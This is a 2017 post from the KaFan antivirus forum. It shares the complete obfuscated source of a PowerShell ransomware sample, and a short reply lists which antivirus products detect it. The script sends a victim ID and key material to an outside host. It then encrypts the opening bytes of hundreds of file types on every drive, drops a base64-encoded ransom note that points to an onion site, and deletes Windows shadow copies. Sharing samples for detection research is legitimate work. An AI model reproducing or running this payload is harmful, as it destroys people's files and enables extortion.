本帖最后由 B100D1E55 于 2017-7-11 08:39 编辑

真实诚……sleep了很久才开始加密
[mw_shl_code=javascript,true]$GhxRgshjdYhjcxRGH = "HKCU:\Software\ENCRDEC\Scripts"
$DghxjcTyahjscYUUajjs = "Version"
if((Test-Path $GhxRgshjdYhjcxRGH) -eq $true)
{exit}
else
{
New-Item -Path $GhxRgshjdYhjcxRGH -Force | Out-Null
New-ItemProperty -Path $GhxRgshjdYhjcxRGH -Name $DghxjcTyahjscYUUajjs -Value "0" `
-PropertyType DWORD -Force | Out-Null}
$756381442010295 = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
$467346782779685 = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
$082171092508287 = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
$926225742886527 = "http://joelosteel.gdn/pi.php"
$910827030402006 = "string=$756381442010295&string2=$467346782779685&uuid=$082171092508287"
$289766261002010 = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
$289766261002010.oPen('PoST', $926225742886527, $faLse)
$289766261002010.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
$289766261002010.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
$289766261002010.SetRequeStHeader("cONneCtiOn", "clOSe")
$289766261002010.SeNd($910827030402006)
Start-Sleep -Seconds 120
[BytE[]]$34623746238743278432462378462378=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($756381442010295)
$JGDSDVNIUTGHBQSDGBHHFERFV = [Text.Encoding]::UTF8.GetBytes($467346782779685)
$hxTgshcYjsjdRgshxjThjsjdJ = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
$hxTgshcYjsjdRgshxjThjsjdJ.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $756381442010295, $JGDSDVNIUTGHBQSDGBHHFERFV, 5).GetBytes(32)
$hxTgshcYjsjdRgshxjThjsjdJ.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$hxTgshcYjsjdRgshxjThjsjdJ.Padding="ZeRos"
$hxTgshcYjsjdRgshxjThjsjdJ.Mode="CBC"
$IjhxRgsaghdWdsagdUjjsncRFhgshd= gDr|where {$_.Free}|Sort-Object -Descending
foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $IjhxRgsaghdWdsagdUjjsncRFhgshd){
        gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
                try{
                        $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
                        if ($sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length -lt 4096){
                        $hxTgashdnUjuwjdcTgshdnRfgshd = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length
                        }
                        else
                        {
                        $hxTgashdnUjuwjdcTgshdnRfgshd = 4096
                        }
            $34623746238743278432462378462378 = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.ReadByTes($hxTgashdnUjuwjdcTgshdnRfgshd)
                        $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.Close()
                        $xYhsjcRtsghhIIIahdhHshIOKKJ = $hxTgshcYjsjdRgshxjThjsjdJ.CreateEncRyPtor()
                        $YhchcRgsghxYhshdcThgh = new-Object IO.MemoryStream
                        $GshshdTgshxJuahxthH = new-Object Security.Cryptography.CryptoStream $YhchcRgsghxYhshdcThgh,$xYhsjcRtsghhIIIahdhHshIOKKJ,"Write"
                        $GshshdTgshxJuahxthH.Write($34623746238743278432462378462378, 0,$34623746238743278432462378462378.Length)
                        $GshshdTgshxJuahxthH.Close()
                        $YhchcRgsghxYhshdcThgh.Close()
                        $xYhsjcRtsghhIIIahdhHshIOKKJ.Clear()
                        $IjxmxRgshhdYHhajhxRtasghhdI = $YhchcRgsghxYhshdcThgh.ToArray()
                        $OlskcTshcUjsmcTgshdjJJ = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
                        $OlskcTshcUjsmcTgshdjJJ.Write($IjxmxRgshhdYHhajhxRtasghhdI,0,$IjxmxRgshhdYHhajhxRtasghhdI.Length)
                        $OlskcTshcUjsmcTgshdjJJ.Close()
                        $bcyHsjhjxRtgahdhPoajndcTghshcJJ = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
            $OkxxRtgshYHjsjcUjajxYhshjc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGZvbnQgZmFjZT0ibW9ub3NwYWNlIj48aDE+ISEhIElNUE9SVEFOVCBJTkZPUk1BVElPTiAhISEhPC9oMT48YnI+DQoNCkFsbCBvZiB5b3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0EtMjA0OCBhbmQgQUVTLTEyOCBjaXBoZXJzLjxicj4NCk1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIFJTQSBhbmQgQUVTIGNhbiBiZSBmb3VuZCBoZXJlOjxicj4NCjxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+DQo8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0FkdmFuY2VkX0VuY3J5cHRpb25fU3RhbmRhcmQiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQWR2YW5jZWRfRW5jcnlwdGlvbl9TdGFuZGFyZDwvYT48YnI+DQogICANCjxwPkRlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBPTkxZIHBvc3NpYmxlIHdpdGggdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLjxicj4NCg0KVG8gcmVjZWl2ZSB5b3VyIHByaXZhdGUga2V5IGZvbGxvdyB0aGlzIGxpbms6PGJyPg0KDQoxLiA8YSBocmVmPSJodHRwOi8vNXp6Zmh6ZnRzcGFkbGdqZS5vbmlvbi50byI+aHR0cDovLzV6emZoemZ0c3BhZGxnamUub25pb24udG88L2E+PGJyPg0KDQo8cD5JZiB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6PGJyPg0KMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgVG9yIEJyb3dzZXI6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkL2Rvd25sb2FkLWVhc3kuaHRtbCI+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sPC9hPjxicj4NCjIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDV6emZoemZ0c3BhZGxnamUub25pb248YnI+DQo0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS48YnI+PC9mb250Pg=="));
                        if(!(Test-path($bcyHsjhjxRtgahdhPoajndcTghshcJJ))){
                        New-IteM -Path $bcyHsjhjxRtgahdhPoajndcTghshcJJ -ItemTyPe file -Value $OkxxRtgshYHjsjcUjajxYhshjc
                        AdD-Content -PAth $bcyHsjhjxRtgahdhPoajndcTghshcJJ -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $082171092508287</p></font></h1>")
                        }}
                catch
                {
               
                }
        }}
$2885456708 = Get-WmiObjEct Win32_ShadoWCopy
ForEach($019384882892 in $2885456708) {
$019384882892.Delete()
}
exit[/mw_shl_code]
ytysh
发表于 2017-7-11 07:11:24 | 显示全部楼层
本帖最后由 ytysh 于 2017-7-11 07:13 编辑

F-Secure KillImmunet Miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-24 04:35 , Processed in 0.093758 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表